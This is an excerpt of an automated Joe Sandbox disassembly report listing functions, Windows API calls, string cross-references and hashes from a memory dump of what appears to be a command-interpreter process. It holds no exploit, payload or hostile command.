_wcsicmp.MSVCRT ref: 00007FF7823D631A
towupper.MSVCRT ref: 00007FF7823D6333
towupper.MSVCRT ref: 00007FF7823D634C
_wcsicmp.MSVCRT ref: 00007FF7823D636C
_wcsicmp.MSVCRT ref: 00007FF7823D638C

Part of subcall function 00007FF7823D6530: iswspace.MSVCRT ref: 00007FF7823D6572

_wcsnicmp.MSVCRT ref: 00007FF7823D6451
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F3DB0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823F3DC2
RtlFreeHeap.NTDLL ref: 00007FF7823F3DD8
_wcsicmp.MSVCRT ref: 00007FF7823F3E5F
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F3EEB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F3F0C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F3F23
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F3F3A
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F3F71
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F3F8A

Strings

ABOVENORMAL, xrefs: 00007FF7823D6279
HIGH, xrefs: 00007FF7823D6310
COMSPEC, xrefs: 00007FF7823F3DF1
SHARED, xrefs: 00007FF7823F3C3F
MIN, xrefs: 00007FF7823D6382
BELOWNORMAL, xrefs: 00007FF7823D6299
/K , xrefs: 00007FF7823F3E55
WAIT, xrefs: 00007FF7823F3C66
REALTIME, xrefs: 00007FF7823F3BF1
/K %s, xrefs: 00007FF7823F3E1D
NODE, xrefs: 00007FF7823F3B17
SEPARATE, xrefs: 00007FF7823F3C18
, xrefs: 00007FF7823F3BE7
.LNK, xrefs: 00007FF7823D6446
AFFINITY, xrefs: 00007FF7823D625B
"%s", xrefs: 00007FF7823F3D96
MAX, xrefs: 00007FF7823F3AEB
NORMAL, xrefs: 00007FF7823F3BCB
NEWWINDOW, xrefs: 00007FF7823D62D7
LOW, xrefs: 00007FF7823D6362

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
API String ID: 1388555566-2647954630
Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
Instruction ID: f2a6cfb2fc34503dcf8d95f1b79d2c7edda16188968898622f454adf045f91d3
Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
Instruction Fuzzy Hash: 1AA2EB31A0878286EB50AB21E4241BDFBA1FF45746FA08179DA4E47F95DFBCD544C720

Function 00007FF7823DE680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E09F4: iswspace.MSVCRT ref: 00007FF7823E0A11
Part of subcall function 00007FF7823E09F4: wcschr.MSVCRT ref: 00007FF7823E0A2B

wcschr.MSVCRT ref: 00007FF7823DE71D
wcschr.MSVCRT ref: 00007FF7823DE738
_get_osfhandle.MSVCRT ref: 00007FF7823DE784
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823DE795
_wcsnicmp.MSVCRT ref: 00007FF7823DE7D5

Strings

^, xrefs: 00007FF7823DEC69
:, xrefs: 00007FF7823DEB36
=,;, xrefs: 00007FF7823DE713, 00007FF7823DE840, 00007FF7823DEBC0, 00007FF7823DEC0F
+: , xrefs: 00007FF7823DE731, 00007FF7823DEC33
:EOF, xrefs: 00007FF7823DE7CB
&<|>, xrefs: 00007FF7823DEC51

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
String ID: &<|>$+: $:$:EOF$=,;$^
API String ID: 511550188-726566285
Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
Instruction ID: d852ab6a451f7d712c8bb0ced2ae2d0a163d92d1f77b10003e8d88227e1f50dd
Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
Instruction Fuzzy Hash: D452D132E0C69286EB64AB15E424279FEE0FB45B46FE44579D94E03B94DFBCE844C720

Function 00007FF7823D9E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF7823D9F25
_wcsnicmp.MSVCRT ref: 00007FF7823D9F4A
_wcsnicmp.MSVCRT ref: 00007FF7823D9F6F
_wcsnicmp.MSVCRT ref: 00007FF7823D9F94
_wcsnicmp.MSVCRT ref: 00007FF7823D9FB9
_wcsnicmp.MSVCRT ref: 00007FF7823D9FDE
wcstol.MSVCRT ref: 00007FF7823DA02F
wcschr.MSVCRT ref: 00007FF7823DA2B1
wcschr.MSVCRT ref: 00007FF7823DA324
wcschr.MSVCRT ref: 00007FF7823DA367

Strings

delims=, xrefs: 00007FF7823D9F87
tokens=, xrefs: 00007FF7823D9FD7
eol=, xrefs: 00007FF7823D9F62
useback, xrefs: 00007FF7823D9F3D
usebackq, xrefs: 00007FF7823D9F1B
skip=, xrefs: 00007FF7823D9FAC

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmp$wcschr$wcstol
String ID: delims=$eol=$skip=$tokens=$useback$usebackq
API String ID: 1738779099-3004636944
Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
Instruction ID: a3340217ca4f38051e41646432df6ac65d608c2f9401f2c466ae5944146c82a7
Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
Instruction Fuzzy Hash: 0E729232F086428AEB50AF65D1242BDB7B1FB4474AFA14079DE0D57B94DFBCA845C360

Function 00007FF7823F7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F7F44
_get_osfhandle.MSVCRT ref: 00007FF7823F7F5C
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F7F9E
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F7FFF
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8020
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8036
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8061
RtlFreeHeap.NTDLL ref: 00007FF7823F8075
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F80D6
RtlFreeHeap.NTDLL ref: 00007FF7823F80EA
_wcsnicmp.MSVCRT ref: 00007FF7823F8177
_wcsnicmp.MSVCRT ref: 00007FF7823F819A
_wcsnicmp.MSVCRT ref: 00007FF7823F81BD
_wcsnicmp.MSVCRT ref: 00007FF7823F81DC
_wcsnicmp.MSVCRT ref: 00007FF7823F81FB
_wcsnicmp.MSVCRT ref: 00007FF7823F821A
_wcsnicmp.MSVCRT ref: 00007FF7823F8239
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8291
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F82D7
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F82FB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F831A
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8364
RtlFreeHeap.NTDLL ref: 00007FF7823F8378
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F839A
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F83AE
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F83E6
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8403
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8418

Strings

pushd , xrefs: 00007FF7823F8232
md , xrefs: 00007FF7823F81B6
cd , xrefs: 00007FF7823F8170
rmdir , xrefs: 00007FF7823F81F4
chdir , xrefs: 00007FF7823F81D5
mkdir , xrefs: 00007FF7823F8213
rd , xrefs: 00007FF7823F8193

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
API String ID: 3637805771-3100821235
Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
Instruction ID: 82c7e7ca7683c270b45a5046980076c07089c904d5590b2df0b46c0e3ba687a2
Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
Instruction Fuzzy Hash: 6EE1C931A047528AEB54AF12F414579FBA0FB49B96BE48274CD0E43B90DFBCA845C730

Function 00007FF7823D3F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D4048
memset.MSVCRT ref: 00007FF7823D406E
memset.MSVCRT ref: 00007FF7823D4094
memset.MSVCRT ref: 00007FF7823D40BA

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D4492
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D45E0
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D4608
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D46DB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D46FA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D4719
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D4738

Part of subcall function 00007FF7823D5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823D51C4

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

CopyFileW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF7823F1DD5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F1DE7

Strings

%s , xrefs: 00007FF7823F1982
%s, xrefs: 00007FF7823D4254

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
String ID: %s$%s
API String ID: 3623545644-3518022669
Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
Instruction ID: 127dc4add57ea4dc3b82a4f1e9be32930758ee85780d7ffeab5c85058e2fba12
Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
Instruction Fuzzy Hash: DFD2C732B0874286EB64AB25E4642BDB7A1FB44746FA0417DDA4E47F94DFBCE844C720

Function 00007FF7823D2C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D2CB6
memset.MSVCRT ref: 00007FF7823D2CDA

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

wcsrchr.MSVCRT ref: 00007FF7823D2E1F
memset.MSVCRT ref: 00007FF7823D2ED4
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D2F36
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D2FA5
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D302C
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D3112
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D3131
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F0E96
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823F0EBD
_wcsicmp.MSVCRT ref: 00007FF7823F0F75
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823F1065
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F1094
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F10AD
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823F10BC
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F10CF
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F10E0
_getch.MSVCRT ref: 00007FF7823F10EC
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F1100
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823F1113
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823F115D
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823F116F

Part of subcall function 00007FF7823E3BAC: wcschr.MSVCRT(?,?,00007EE3,00007FF7823FB37D), ref: 00007FF7823E3BE6

Strings

%9d, xrefs: 00007FF7823D30B7, 00007FF7823F0D21
%s, xrefs: 00007FF7823D3222, 00007FF7823F0EE9

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
String ID: %9d$%s
API String ID: 4286035211-3662383364
Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
Instruction ID: d443db47ecbfa6846b77ee6134a7cd23a1006b0a228c9782b6df6b1933e8f0e2
Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
Instruction Fuzzy Hash: E252D832B08B828AEB60AF25E8642FDB7A0FB85746FA04175DA0E47B94DF7CD545C710

Function 00007FF7823E18D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF7823E1949
towlower.MSVCRT ref: 00007FF7823E19F6
wcsrchr.MSVCRT ref: 00007FF7823E1A0C
wcsrchr.MSVCRT ref: 00007FF7823E1A3F
wcsrchr.MSVCRT ref: 00007FF7823E1A5A
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E1ADD

Strings

fdpnxsatz, xrefs: 00007FF7823E1A05

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcsrchr$towlower
String ID: fdpnxsatz
API String ID: 3267374428-1106894203
Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
Instruction ID: aeb88e009ecc193ae8e2883deb81461c5e02de91fc86453f6caec7a665ed3c66
Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
Instruction Fuzzy Hash: CE420826B0868695EBA5AF15D5202BDA7A0FF45B85FA44079DE4E07FC4DF7CE844C310

Function 00007FF7823D7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D76E5

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

_get_osfhandle.MSVCRT ref: 00007FF7823D7745
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D7759
_get_osfhandle.MSVCRT ref: 00007FF7823D776C
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D7783
_get_osfhandle.MSVCRT ref: 00007FF7823D77A3
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D77C9
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D7808
wcsrchr.MSVCRT ref: 00007FF7823F49BE
_wcsnicmp.MSVCRT ref: 00007FF7823F4A02
SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F4A81

Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6

Strings

DPATH, xrefs: 00007FF7823F499A

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
String ID: DPATH
API String ID: 95024817-2010427443
Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
Instruction ID: ffcc51e529dfadd68b74d418d1ab82f78ed411a0cad2ee2724a8c40e65ed5154
Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
Instruction Fuzzy Hash: 7012EB32A1868286EB60AF11A41017DFBA1FB89752FA4517DEF4E53B94DF7CD844CB20

Function 00007FF7823D5240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON

Download Yara Rule

Strings

:, xrefs: 00007FF7823F3261
[...], xrefs: 00007FF7823F3013
[.], xrefs: 00007FF7823F3128
..., xrefs: 00007FF7823F2C8C
[..], xrefs: 00007FF7823F2FB5

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID:
String ID: [...]$ [..]$ [.]$...$:
API String ID: 0-1980097535
Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
Instruction ID: 326df3fa8d2ce2721554a72ea105c3bb5bdc97ca4568fc61828937fd632bc166
Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
Instruction Fuzzy Hash: E932D432A0878386EB60EF21E4642F9B7A0FB45786FA04179DA0D47B95DFBCD545C720

Function 00007FF7823D6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON

Download Yara Rule

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823D6F34
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF7823D6F49
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D6F5F
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF7823D6F74
realloc.MSVCRT ref: 00007FF7823F4327

Part of subcall function 00007FF7823E5508: GetUserDefaultLCID.KERNELBASE(?,?,?,?,00007FF7823D6F97), ref: 00007FF7823E550C

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823D6FA8
memmove.MSVCRT ref: 00007FF7823D702F
